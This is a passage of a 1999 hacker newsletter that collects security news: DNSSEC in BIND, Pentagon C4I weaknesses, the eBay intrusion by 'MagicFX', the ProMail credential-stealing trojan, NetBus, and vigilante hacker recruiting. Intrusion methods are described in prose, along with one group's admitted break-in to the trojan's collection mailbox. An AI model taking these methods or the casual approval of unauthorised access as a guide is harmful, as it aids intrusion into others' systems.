who lived in a trailer park down South."

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

12.0 DNS Spoofing finally resolved?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sat, 20 Mar 1999 22:08:46 -0700 (MST)
From: mea culpa
To: InfoSec News
Subject: [ISN] bind with DNSSEC finally released
Sender: owner-isn@repsec.com

Originally From: Lucky Green
Originally To: cypherpunks@algebra.com

Seems bind 8.2 with the long-awaited secure DNS fully integrated has finally
been released. Say goodbye to DNS spoofing. Since the included crypto is meant
to be used for authentication only and the licensing agreement prohibits the
use of the said crypto for non-authentication purposes, the distribution is
freely exportable. :-)

Install bind 8.2 on your DNS server today and permanently fix one of the
largest and longest-standing security holes on the Internet.

ftp://ftp.isc.org/isc/bind/src/8.2/

--Lucky Green
PGP 5.x encrypted email preferred

@HWA

13.0 [ISN] IETF working group seeks to improve security alerting
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 18 Mar 1999 00:33:31 -0700 (MST)
From: mea culpa
To: InfoSec News
Subject: [ISN] IETF working group seeks to improve security alerting

Forwarded From: darek milewski

http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/1999/0316security.html

Sound the alarm!
IETF working group seeks to improve security alerting.
By Sandra Gittlen
Network World Fusion, 03/16/99

MINNEAPOLIS - An IETF working group has stepped up work on a protocol for
broadcasting alerts of network breaches across proprietary security
applications.

The Intrusion Detection Message Exchange Protocol (IDMEP) would let
applications - and system managers - quickly share information about attacks,
according to IDMEP working group members. They are meeting here as part of an
overall IETF conference.
"[IDMEP] will be useful for attacks launched from one domain to another," says
working group attendee Brian Tung, a computer scientist at the University of
Southern California's Information Sciences Institute. "If a source domain
notices an attack, it can notify the destination network. Right now, that's
done by a human."

The group had met last year at the IETF meeting in Orlando, but was
unsuccessful in gaining consensus and had to revamp its plans. This time,
meeting attendees seemed encouraged by the group's efforts.

With the protocol, which could be based on SNMP Version 3, an alert detailing
the type of attack in progress will be automatically sent across the network,
along with a reference, such as a URL or a system file, where the network
manager can find further information.

That information could be the threshold setting of the alerter's system
letting the recipient know what the alerter considers an attack or what the
alerter suggests as a response for such an attack.

Mark Wood, product line manager at Internet Security Systems in Atlanta, says
IDMEP could dramatically improve responses to attacks because networks will be
sharing information, not duplicating efforts.

In fact, Tung says that hooking the IDMEP to policy networks could let users
set up automatic responses to alerts and, therefore, ward them off.

"There are a number of dollars to be had in [the intrusion detection tools]
market," says Stuart Staniford-Chen, co-chair of the working group. In fact,
the projected market for intrusion detection tools is expected to be $200
million, according to analysts at the Aberdeen Group, a Boston consultancy.
"Therefore, we need to get moving on this [protocol]."

Wood says he expects the protocol to be completed by the middle of next year,
but products based on a proposed standard could be released as early as the
first quarter of next year.

Cisco and Axent are also working on the protocol.
@HWA

14.0 Report: Military computers vulnerable
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.usatoday.com/life/cyber/tech/cte684.htm

Report: Military computers vulnerable

WASHINGTON (AP) - The military's key communications infrastructure linking
combat, intelligence and command forces is dangerously vulnerable to attacks
from cyberspace and requires urgent changes in Defense Department policy, said
a study released Monday.

The Command, Control, Communications, Computers and Intelligence systems,
known as C4I, is compromised by security problems and also by a military
culture prone to treating such problems as a lesser priority, the National
Research Council reported.

''The rate at which information systems are being relied on outstrips the rate
at which they are being protected,'' it said. ''The time needed to develop and
deploy effective defenses in cyberspace is much longer than the time required
to develop and mount an attack.''

Despite evidence of security lapses in C4I -- which handles communications and
warning tasks all along the chain of command -- the Pentagon's ''words
regarding the importance of information systems security have not been matched
by comparable action,'' the report said.

''Troops in the field did not appear to take the protection of their C4I
systems nearly as seriously as they do other aspects of defense,'' said the
report, which Congress ordered the Pentagon to commission in 1995. The council
is an independent organization chartered by Congress to advise the government.

The report indicated the problems were due more to the Pentagon's management
of the systems than to the technology itself. It cited C4I workers' lack of
stature compared with traditional combat forces, compatibility problems
between the services and a need for more budget flexibility on the matter from
both the Defense Department and Congress.

In a statement, the Pentagon acknowledged that the U.S.
military's strength ''is our information technology,'' and that ''our
dependence on such assets, which may be subject to malicious attack, makes
information technology our weakness as well.''

It said that as the council's report was being prepared, the Defense
Department had already improved protection against computer attack by
implementing new programs, establishing a joint task force for computer
defense and expanding training of its information technology personnel.

But Kenneth Allard, an analyst who has written about C4I, said its weaknesses
are in part the fault of ''Industrial Age'' military acquisition policies --
applying to computers as well as tanks, ships and aircraft -- that give the
services their own procurement duties. Ships and tanks may perform different
tasks, he said, but the Army, Navy and other services need a single-standard
computer system.

''Twenty-first century combat is the war of the databases, in which
information flows must go from the foxhole to the White House and back down
again,'' said Allard, a former Army colonel and analyst at the Center for
Strategic and International Studies who had not yet read the council's report.

The report recommended:

- Making C4I a greater budget priority in defense spending, with a flexibility
  that can ''exploit unanticipated advances in C4I technology.''
- Designating an organization responsible for providing direct defensive
  operational support to commanders.
- Funding a program to conduct frequent, unannounced penetration testing of
  C4I systems.
- Ensuring that programs are operable even if one part has been penetrated by
  an adversary.
- Emphasizing the importance of information technology in the military
  leadership.
- Establishing an Institute for Military Information Technology, possibly as
  part of an existing body.
--
ShadowVrai
http://shadowvrai.evil.nu
"Did you really think you could call up the devil and ask him to behave?"

@HWA

15.0 International raid cracks child porn ring
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cnn.com/TECH/computing/9903/19/germany.porno.reut/index.html

International raid cracks child porn ring
March 19, 1999
Web posted at: 5:35 p.m. EST (2235 GMT)

MUNICH (Reuters) -- German police said on Friday they had cracked an
international Internet child pornography ring after launching a coordinated
sweep through seven countries.

In a raid of private homes coordinated from Munich, German police said they
had confiscated thousands of outlawed photographs and video images which had
been traded and distributed via Internet "chat rooms."

German police said the action, codenamed "Bavaria," had taken place on
Wednesday and involved simultaneous raids of suspects' homes in Germany,
Switzerland, Sweden, Britain, Norway, the United States and Canada.

Holger Kind, an official from the Federal Crime Office, said the material
uncovered had been the widest sweep of its kind led from Germany.

"You can assume this will not be the last raid of its kind," Kind told a news
conference.

Kind said some suspects had already confessed to involvement in the ring. If
convicted in Germany, the suspects could face a prison sentence of up to five
years in jail.

Switzerland and Britain have arrested one suspect each.

Police in Sweden and the United States also found banned material in the raids
featuring children between the ages of three and four, police in Bavaria said.
@HWA

15.1 ACPM : Anti-Child Porn Militia wants YOU
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Anti Child Porn Militia
contributed by system.administrator

The Anti Child Porn Militia is recruiting new members. They are asking for
anyone who thinks they can be of assistance in eliminating child pornography
from the internet to assist them.

http://infovlad.net/ACPM/

From the ACPM site;

We pray for children
who are sick.
children who may not live to see their next birthday.... or tomorrow,
children who go into hospitals, never to come out
children who don't deserve to die.

We pray for the children that don't understand why......
why they're not like other children who are healthy
children who play in the sunlight
dance on the grass,
children who enjoy life
children that don't think about death.

We pray for children
who stare at photographers from behind barbed wire,
who can't run down the street in a new pair of sneakers,
who are born in places we wouldn't be caught dead in,
who live in an X-rated world.

We pray for those children
who never get dessert,
who have no security blanket to drag behind them,
children who watch their parents watch them die.
children who can't find any bread to steal,
children who don't have any rooms to clean up,
whose pictures aren't on anybody's dresser,
whose monsters are real.

We pray for children
whose nightmares come in the daytime,
children who will eat anything,
who have never seen a dentist,
who aren't spoiled by anybody,
children who go to bed hungry and cry themselves to sleep.
who live and move but have no being.

We pray for children who want to be carried,
and for those who must be.
For those who never get a second chance.

We pray for those children who will grab the hand of anybody kind enough to
offer it.

For these children we pray.

- unknown -

'Hackers wanted:' http://infovlad.net/ACPM/signup.html

Only sign up if you have some skills and time to help out, don't sign up for
bragging rights, you won't be doing anyone any favours...
- Ed

@HWA

16.0 Hacking contest, win a Netfinity server!
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hacking Contest
from HNN
contributed by ju

PC Intern, a German computer magazine, is sponsoring a contest to draw
attention to web server security. They have set up a WindowsNT and a Linux
system with a hidden file. First person to get the file wins an IBM
Netfinity-server. Try your skillz.

PC Intern:
http://www.pcintern.de/hacker.htm

* Welcome to the Web-Hack!
* We wish all participants good luck!
* Look for "hack.txt", please!
* This is the way to the Linux-Server: IP: 195.227.43.210
* This is the way to the Windows-NT-Server: IP: 195.227.43.211

Is there optimal protection?

The editorial staff of the German computer magazine PC INTERN wants to draw
attention to security of data in web-server-systems in an outstanding contest.
The hack-event aims at checking and discussing the reliability of Windows-NT-
and Linux-PCs' security.

Starting at 9.00 am on Thursday 18th, 1999, you will find two links on this
site which will lead to the servers to be hacked. On both servers there is
hidden a telephone-number and a password. The person who will call first
telling the password and the way he or she hacked the server, wins an IBM
Netfinity-server.

PC INTERN grants the hackers total exemption from punishment - PC INTERN's
single aim is to expose and discuss the security's weak spots.

On IBM's stage (hall 2, D28) between 1.00 and 2.00 pm, a debate will finish
the web-hack-event. Dr. Harald Feldkamp, editor in chief, will discuss
security in the world wide web with the following participants:

Dr. Werner Schmidt      Ministerialrat at the Federal Commissioner for Data
                        Protection
Wilfried Seiffert       Ministerialrat at the Lower Saxony State Commissioner
                        for Data Protection
Frank Kertscher         Principal IT Security for IBM Global Services
Klaus Birkenbihl        GMD Informationstechnik GmbH
Tilmann Müller-Gerbes   Head of Professional Services at S.u.S.E.
Felix Höger             Managing Director of NDH Netzwerkdienste Höger

@HWA

17.0 eBay owned
     ~~~~~~~~~~

http://www.ebay.com

MagicFX cracks eBay
contributed by Code Kid

According to MagicFX eBay has been owned for quite some time. To prove this on
March 13th he replaced the main web page on one of the servers for a
journalist to confirm. The article goes into detail on just how badly eBay is
owned.

Forbes;
http://www.forbes.com/tool/html/99/mar/0319/side1.htm

Going once, going twice ... HACKED!
By Adam L. Penenberg

EBay (nasdaq: EBAY), the hot one-to-one auction site, was hacked on Saturday
March 13 by a 22-year old college student who goes by the handle MagicFX. But
the story doesn't end there.

The hacker maintains access to the site and can return at will. He has "root"
access to eBay's computers, the same kind the legitimate administrators enjoy.
This means he could change prices or place fake ads, divert traffic to other
sites or even take down the entire network.

This was starkly illustrated to this reporter on Wednesday night, when the
hacker, to prove his point, took down eBay's home page for two minutes and
replaced it with the message:

    Proof by MagicFX that you can't always trust people… not even huge
    companies. (who woulda known that?)

    "It's 9:30 PM . . . do you know who has YOUR credit card information?"

Although eBay customers don't use credit cards to pay for merchandise--the
site acts as a middleman--sellers use them to pay the company service fees.

When contacted, the company refused to comment, saying that unnamed law
enforcement officials had requested that eBay remain silent about issues
surrounding hacking.

Initially, the hacker, who would not divulge his real name, gained access to
eBay's computers on Saturday afternoon by figuring out what accounts existed,
then trying simple passwords. Since eBay is an e-commerce site, MagicFX tried
words like "commerce," "trading" and "eBay," until he cracked one, although he
would not divulge the password he used.
He says he was surprised eBay's technicians didn't use standard password
protecting schemes, which would have meant a mixture of numbers and letters.

Once inside, MagicFX employed a technique referred to as a "local root buffer
overflow." He ran a script that transmits too much information into a targeted
zone. The data that can't fit is then manipulated so that he was able to trick
the computer into running his commands at an elevated privilege.

"I exploited a buffer overflow condition, which existed in an SUID root
program," says the hacker, who is finishing up a B.S. in computer science.
"Then I used software which I had written myself to get to the rest of the
network. FreeBSD was the first machine I accessed, the rest were Solaris."

From there, MagicFX modified the system's software so that instead of
providing administrators with a secure way to work from a remote machine, it
logged that information to a hidden file, so that not only could he intercept
passwords and log in names, but actually watch everyone's keystrokes.

"After gaining access to more of the network, I tried to figure out how the
service worked. Most of the web servers run on Windows machines, which use the
SMB protocol to load a template page off a specified machine and dynamically
create the HTML."

For Saturday's hack, MagicFX left his page up for about 45 minutes; he claims
it was viewed by about 4,000 site visitors. (Hackers often attack on weekend
evenings, because most system administrators are out of the office.) The
reason more people didn't witness the hack is that eBay deploys several web
servers and balances the load based on the amount of traffic. Since MagicFX
exploited only one machine for the web page hack, only users served by that
machine could view the hacked page.

But he claims the company must know about the hack, since he monitored E-mails
from users alerting the company. He pulled his own page down and logged off
when he spotted a system administrator--"to be nice."
Mirrors--or copies--of both Saturday's and Wednesday's hacked eBay pages have
been archived by Brian Martin, a computer security consultant, on his site
attrition.org (http://www.attrition.org/mirror/attrition/ebay.com)

What does MagicFX say about eBay's security? "I think they have better
security than NASA, but that's not saying much."

Martin, who also witnessed the Wednesday night eBay hack, says, "Large systems
like eBay are focused on keeping the money machine running smoothly, but this
has come at the expense of security. Users should realize that just because a
site says their personal information and credit card numbers are secure
doesn't necessarily make it so."

MagicFX says he hacked eBay, which has a market cap of more than $18 billion,
because he wanted to see how a large e-commerce site worked from the inside.
Once there, he discovered an added bonus: eBay uses a proprietary system to do
its trading, he says, and the source code is highly prized in the hacker
world. As a result, a number of hackers have approached him for a copy, but he
has not complied, since he hasn't had a chance to sift through it yet.

This was not the first hack for MagicFX. Recently he also defaced web sites
promoting the movies Varsity Blues and 200 Cigarettes, "because they got a lot
of hits and I didn't like the movies really." He also hit monicalewinsky.com
because it is "anti-Clinton" and "ourfirsttime," a site that claimed it would
webcast a man and woman losing their virginity. MagicFX says he hacked the
site to get the word out it was a media hoax.

"I have learned at least as much by hacking as I have in school," he says.
External link: attrition.org

@HWA

18.0 Aussies to ban Net pr0n
     ~~~~~~~~~~~~~~~~~~~~~~~~

From The Australian
http://technology.news.com.au/techno/4317712.htm

Alston's regime to ban Net nasties
By WAYNE ADAMS and DAN TEBBUTT
20mar99

COMMUNICATIONS and Information Technology Minister Richard Alston has unveiled
a regime that will effectively ban X-rated and Refused Classification material
from the Internet.

"There's no doubt the Internet provides enormous educational and informational
opportunities but, at the same time, it does pose considerable risks for the
community," he said yesterday.

"We are therefore proposing to introduce a new regime that will hopefully
ensure, certainly for Internet sites hosted within Australia, that we block
access to material that is either illegal, Refused Classification or X-rated
and, in relation to R-rated material, is only available to those over 18 years
of age."

The Australian Broadcasting Authority will oversee the regime.

Community and Internet industry groups will be included under the proposals.
They will provide a "hotline" on offensive material and pass information to
the ABA, monitor online sites, advise on complaints mechanisms and provide
community education.

If the ABA thinks content is serious enough, it will be able to prevent access
to the material pending a National Classification Board opinion.

The authority will have to issue a notice to a service provider to halt access
to any content deemed to be proscribed content.

Senator Alston rejected suggestions that the announcement was related to the
Telstra sale or appeasing Independent senator and morals campaigner Brian
Harradine.

"Senator Harradine is probably the most visible public manifestation of
concern, but the fact is that there are many hundreds of thousands of people
in Australia who would have the greatest concern if they thought that
under-age children could have access to illegal or highly offensive material,"
he said.
However, Labor's communications spokesman, Stephen Smith, said Senator
Harradine and parents "should not be duped".

"The announcement today is about Australian content, and it's a very small
proportion of Internet content which is locally produced and locally put
online," he said.

Kimberley Heitman, chairman of Internet advocacy group Electronic Frontiers
Australia, said: "This is as bad as it gets – they have ignored everything the
Internet industry has said. None of these things will affect end users. It
will just drive content offshore."

@HWA

19.0 More on the Promail email trojan
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Originally reported in the last issue, here's more info from packetstorm on
the Promail email trojan program.

Date: Fri, 19 Mar 1999 09:41:18 +0100
From: Aeon Labs
To: packetstorm@genocide2600.com
Subject: security/privacy news

(Perhaps this might be of interest to Your readers.)

ProMail v1.21, an advanced freeware mail program spread through several
worldwide distribution networks (SimTel.net, Shareware.com and others), is a
trojan. Upon discovering - through LAN sniffing - that the program would
attempt to connect to SMTP instead of POP3 when a regular mail check was
performed, we reverse-engineered the software. ALL of the personal user data,
including the user's password in encrypted format, is sent to an account on
NetAddress - a free email provider - as soon as a valid internet connection is
detected. Apart from this "feature", the software is 100 % functional and very
well done.

Well, it seems that 1999 is the worst year for privacy...

More detailed information can be found on our web site at
http://cool.icestorm.net/aeon/news.html

---------------------------------------------------------------------
Aeon Labs
http://cool.icestorm.net/aeon

[http://cool.icestorm.net/aeon/news.html]

[03.99] ProMail v1.21, an advanced freeware mail program for Windows 95/98, is
a trojan.
It has been spread through several worldwide distribution networks
(SimTel.net, Shareware.com and others) as proml121.zip. Upon discovering -
through LAN sniffing - that the program would attempt to connect to SMTP
instead of POP3 when a regular mail check was performed, we reverse-engineered
the software.

The executable, which appears to have been created with Borland Delphi, has
been packed with Petite (a shareware Win32-EXE compressor) and then "hexed" to
make disassembly harder.

ProMail v1.21 supports multiple mailboxes; every time a new mailbox is
created, an "ini" file containing the user's full name, passwords, email
addresses, servers and more is generated. Prior to doing any other action, the
program performs a check for a valid network connection which, if found,
allows for the sending of ALL of the personal user data, including the user's
password in encrypted format, to an account on NetAddress - a free email
provider.

Apart from this "feature", the software is 100 % functional and very well
done. For further information or a more detailed analysis contact us.

---------------------------------------------------------------------------------

Date: Sat, 20 Mar 1999 03:51:00 -0500 (EST)
From: aeon@army.net
To: packetstorm@genocide2600.com
Subject: Re: your mail

currently our members have disassembled and analyzed the whole executable.
the only thing it appears to do as a trojan is to send the account data
entered by the user: full name, organization, email address, user name,
password (encrypted), smtp and pop3 servers, etc. and since promail supports
multiple accounts, each newly created account is sent.

the data for each account is contained in a text file which is used to
initialize promail at run-time. the same text file is used as the body of the
email which is sent to the author (supposedly) of the program. it appears that
all emails are sent with the same subject line: "kirio".

the program also creates the file promail.pml in its directory.
it's a zero length file used as a permanent flag to remind the trojan that one
or more accounts' data could not be sent in the last session (for example,
when accounts are created off-line, or when not followed by a mail check in
the same session).

we also managed to crack the mailbox to which account data is sent. about ~80
emails (== accounts) were found and another dozen were received after only ten
minutes or so. accounts for microsoft, michigan us army, old bridge chemicals
and a videogames company - amongst the others - were found.

we have merely informed a _contact_ (not the ml) in ntbugtraq and several
"underground" news/security sites. well you can contact the various *traq
mailing lists if you want. we don't care if people still trust anything that
can be downloaded from the net anyway. i guess we're not exactly "white hat"
hackers :P

if you need any help or further analysis on a specific part of the program
please feel free to contact us.

------------------------------------------------------------------------
Aeon Labs
http://cool.icestorm.net/aeon

---------------------------------------------------------------------------------

Date: Sun, 21 Mar 1999 09:40:26 +0100
From: Patrick Oonk
To: tattooman@ADRIC.GENOCIDE2600.COM
Subject: [patrick@pine.nl: ProMail trojan proof]

----- Forwarded message from Patrick Oonk -----

Hi,

I've tested the ProMail Trojan, it sends the info to naggamanteh@usa.net using
the smtp server you supply when creating an account.

I'll Cc: abuse@usa.net and bugs@shareware.com

ProMail can still be downloaded at many sites, just check
http://search.shareware.com/code/engine/File?archive=sim-win95&file=email%2fproml121%2ezip&size=409141

These are the queue files at my smtp server after I installed ProMail and
created an account:

$ more /var/spool/mqueue/qfPAA17183
V2
T921939650
K921939657
N1
P30435
I6/0/88205
M... reply: read error from office.pine.nl.
Fb
$rSMTP
$sfoo
$_foo.domain.com [10.0.0.1]
S
RPFD:
H?P?Return-Path:
HReceived: from foo (foo.domain.com [10.0.0.1]) by bar.domain.com (8.9.1/8.9.1) with SMTP id PAA17183 for ; Sat, 20 Mar 1999 15:20:50 +0100 (MET)
H?D?Date: Sat, 20 Mar 1999 15:20:50 +0100 (MET)
H?F?From: patrick@pine.nl
H?M?Message-Id: <199903201420.PAA17183@bar.domain.com>
HTo: naggamanteh@usa.net
HSubject: kirio

$ more /var/spool/mqueue/dfPAA17183
Name=New Account
[From]
EMail=patrick@pine.nl
Name=Patrick Oonk
Organization=Pine Internet B.V.
[ReplyTo]
EMail=patrick@pine.nl
Name=Patrick Oonk
[POP3]
Server=pop.domain.com
Port=110
User=patrick
Password=1hFATUIxWOkJ3b3N3chBXZrFmZMUE
PromptPassword=0
DoPOP=1
StandardDownload=0
[SMTP]
Server=smtp.domain.com
Port=25
DoSMTP=1
[Filter]
Keep=
Delete=

--
: Patrick Oonk - http://patrick.mypage.org/ - patrick@pine.nl :
: Pine Internet B.V. Consultancy, installation and management :
: Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ :
: -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- :
: "unix is for types without a social life..." - Patrick van Eijk :

----- End forwarded message -----

---------------------------------------------------------------------------------

Date: Mon, 22 Mar 1999 18:20:50 +0900 (JST)
From: Aeon Labs
To: packetstorm@genocide2600.com
Subject: ProMAIL users

So far we have collected hundreds of email *addresses* from
naggamanteh@usa.net (only the headers were retrieved, we don't want their
passwords/personal data/etc). With these addresses, users of ProMail could be
warned about the problem with their passwords.
If you can find people who are willing to do the work, we'll send you a list of the addresses we have collected.

-----------------------------------------------------------------------------
Aeon Labs
http://cool.icestorm.net/aeon

20.0 C4I - Pentagon's cyberdefenses criticized
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pentagon's cyberdefenses criticized
Report: Threats aren't taken seriously enough by HQ, troops
MSNBC STAFF AND WIRE REPORTS

WASHINGTON, March 22 - The military's key communications infrastructure is dangerously vulnerable to attacks from cyberspace and requires urgent changes, according to a new study ordered by Congress and sponsored by the Pentagon. One avenue the Pentagon was advised to consider was a change in policy that would allow it to counter-attack when a cyberattacker strikes.

The Command, Control, Communications, Computers and Intelligence systems - known as C4I - are compromised by security problems and also by a military culture prone to treating such problems as a lesser priority, a National Research Council committee reported.

"The rate at which information systems are being relied on outstrips the rate at which they are being protected," it said. "The time needed to develop and deploy effective defenses in cyberspace is much longer than the time required to develop and mount an attack."

It also suggested the Pentagon consider whether "counter-attack is an appropriate response to a cyber attack." As U.S. policy now stands, the Pentagon may not go after cyber attackers, instead handing off investigations to civilian law enforcement agencies.

Despite evidence of security lapses in C4I - which handles communications and warning tasks along the chain of command - the Pentagon's "words regarding the importance of information systems security have not been matched by comparable action," the report said.
MANAGEMENT CRITICIZED

"Troops in the field did not appear to take the protection of their C4I systems nearly as seriously as they do other aspects of defense," said the report, which Congress ordered the Pentagon to commission in 1995. The council is an independent organization chartered by Congress to advise the government.

The committee said it observed one military field exercise in which personnel in an operations center mistakenly took as a joke a cyber attack on their systems.

The report indicated the problems were due more to the Pentagon's management of the systems than to the technology itself. It cited C4I workers' lack of stature compared with traditional combat forces, compatibility problems between the services and a need for more budget flexibility on the matter from both the Defense Department and Congress.

PENTAGON'S RESPONSE

In a statement, the Pentagon acknowledged that the military's strength "is our information technology," and that "our dependence on such assets, which may be subject to malicious attack, makes information technology our weakness as well."

It said that as the council's report was being prepared, the Defense Department had already improved protection against computer attack by implementing new programs, establishing a joint task force for computer defense and expanding training of its information technology personnel.

But Kenneth Allard, an analyst who has written about C4I, said its weaknesses are in part the fault of "Industrial Age" military acquisition policies - applying to computers as well as tanks, ships and aircraft - that give the services their own procurement duties. Ships and tanks may perform different tasks, he said, but the Army, Navy and other services need a single-standard computer system.
"Twenty-first century combat is the war of the databases, in which information flows must go from the foxhole to the White House and back down again," said Allard, a former Army colonel and analyst at the Center for Strategic and International Studies who had not yet read the council's report.

RECOMMENDATIONS

The report recommended:

o Making C4I a greater budget priority in defense spending, with a flexibility that can "exploit unanticipated advances in C4I technology."
o Designating an organization responsible for providing direct defensive operational support to commanders.
o Funding a program to conduct frequent, unannounced penetration testing of C4I systems.
o Ensuring that programs are operable even if one part has been penetrated by an adversary.
o Emphasizing the importance of information technology in the military leadership.
o Establishing an Institute for Military Information Technology, possibly as part of an existing body.

An archive audio copy of the Senate hearing is available via the FedNet service at www.fednet.net/h0322b.htm.

MSNBC's Miguel Llanos and The Associated Press contributed to this report.

@HWA

21.0 [ISN] NetBus 'Trojan' Splits Security Community
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NetBus 'Trojan' Splits Security Community
(03/02/99, 7:46 p.m. ET)
By Lee Kimber, Network Week

Internet-connected networks could be left vulnerable to Trojan attacks because leading anti-virus software vendors have said they won't scan and disable a new, more powerful NetBus Trojan.

Remote-control programs like NetBus were dubbed Trojans because they could be hidden on computers by crackers. The latest version of NetBus has split network-security experts because its author said it was not a Trojan as it remained visible. But crackers reportedly rewrote it to make it invisible within days of its launch.
Data Fellows and Sophos said their anti-virus products would not disable the recently launched remote-control Trojan NetBus 2 Pro because its Swedish author, Carl-Fredrik Neikter, was a professional who now charged $12 for a legitimate shareware product.

"NetBus 2.0 Pro is not detected as it is now commercial software," according to a spokesman for Data Fellows' European office in Finland. "NetBus 1.x up to 1.7 was detected by anti-virus scanner F-Secure but not NetBus 2.0."

Data Fellows' website reported that earlier NetBus versions were used frequently to steal data and delete files on people's machines. NetBus lets crackers take remote control of networked PCs, but publicity over its spread has been eclipsed by the Back Orifice remote-control Trojan written by hacker group Cult of the Dead Cow. But unlike Back Orifice, NetBus can infect Windows NT machines and is mo